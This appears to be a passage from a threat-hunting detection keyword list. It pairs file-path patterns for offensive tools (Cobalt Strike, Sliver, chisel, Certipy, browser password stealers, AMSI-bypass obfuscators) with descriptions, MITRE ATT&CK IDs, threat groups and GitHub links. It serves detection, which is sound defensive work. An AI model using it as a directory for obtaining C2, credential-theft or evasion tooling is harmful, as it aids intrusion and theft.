-*/C2Profiles/*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/C2script/*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*/C2Server.py*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/C2-Tool-Collection/*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*/cain.html*,offensive_tool_keyword,Cain&Abel,Cain & Able exploitation tool file ,T1075 - T1110 - T1071 - T1003 - T1555,TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md,1,1,N/A,N/A,8,743,233,2023-09-28T15:38:54Z,2021-05-11T12:38:17Z -*/campaign/*/implant/get_all*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/canary.go,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/CandyPotato.cpp*,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,1,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*/CandyPotato.sdf*,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,1,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*/CandyPotato.sln*,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,1,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*/CandyPotato.vcxproj*,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,1,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*/CapBypass.ps1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,0,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*/carlosevieira/Dirty-Pipe*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/carlosevieira/Dirty-Pipe,1,1,N/A,N/A,1,8,5,2022-03-07T21:01:15Z,2022-03-07T20:57:34Z -*/cassandra-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cassandra-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cc2_frp.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*/cccam-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cerbrutus*,offensive_tool_keyword,cerbrutus,Network brute force tool. written in Python. 
Faster than other existing solutions (including the main leader in the network brute force market).,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Cerbrutus-BruteForcer/cerbrutus,1,1,N/A,N/A,3,290,42,2021-08-22T19:05:45Z,2021-07-07T19:11:40Z -*/Certipy.git*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,1,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*/Certipy/*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,1,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*/CertStealer*,offensive_tool_keyword,CertStealer,A .NET tool for exporting and importing certificates without touching disk.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/TheWover/CertStealer,1,1,N/A,N/A,5,450,67,2021-10-08T20:48:34Z,2021-04-21T14:20:56Z -*/certsync.git*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,1,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*/cfn__resource_injection_lambda*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/ChainBuilder.py*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z 
-*/charlotte.cpp*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*/charlotte.py*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*/CheckPort.exe*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*/CheeseTools.git*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*/Chimera.git*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/Chimera.git*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,1,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*/chimera.py*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR 
Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*/chimera.sh*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/chisel.exe*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel.git*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel@latest*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel-darwin_amd64*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel-freebsd*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel-linux_*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - 
TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel-master*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel-windows_amd6*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chrisk44/*,offensive_tool_keyword,Github Username,Github username known for network exploitation tools,N/A,N/A,N/A,N/A,Network Exploitation tools,https://github.com/chrisk44/Hijacker,1,1,N/A,N/A,10,2213,435,2020-08-26T19:01:31Z,2016-11-25T01:39:07Z -*/chrome_decrypt.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/ChromeDump/*,offensive_tool_keyword,chromedump,ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser,T1059.007 - T1114.001 - T1518.001 - T1552.002,TA0005 - TA0009 - TA0011,N/A,N/A,Credential Access,https://github.com/g4l4drim/ChromeDump,1,1,N/A,N/A,1,54,1,2023-06-30T09:07:59Z,2023-01-26T20:44:06Z -*/chromium_based_browsers.py*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,1,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*/cics-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cics-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cics-user-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cics-user-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/CIMplant.exe*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*/CIMplant.git*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*/CIMplant/Commander.cs*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*/citrix-brute-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/citrix-enum-apps.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/citrix-enum-apps-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/citrix-enum-servers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/citrix-enum-servers-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/clamav-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/clickme.docx*,offensive_tool_keyword,POC,CVE-2022-30190 Follina POC,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/onecloudemoji/CVE-2022-30190,1,1,N/A,N/A,2,107,33,2022-05-31T09:35:37Z,2022-05-31T06:45:25Z -*/client/beef.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/client/bof/*.asm*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*/Client/Commands/Enumeration.yaml*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Commands/Execution.yaml*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Commands/Injection.yaml*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Commands/Lateral.yaml*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Commands/Tokens.yaml*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/client/generated-stagers/*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - 
T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/Client/Pages/Drones.razor*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Pages/Payloads.razor*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Pages/Pivots.razor*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - 
TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/clipboardinject.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - 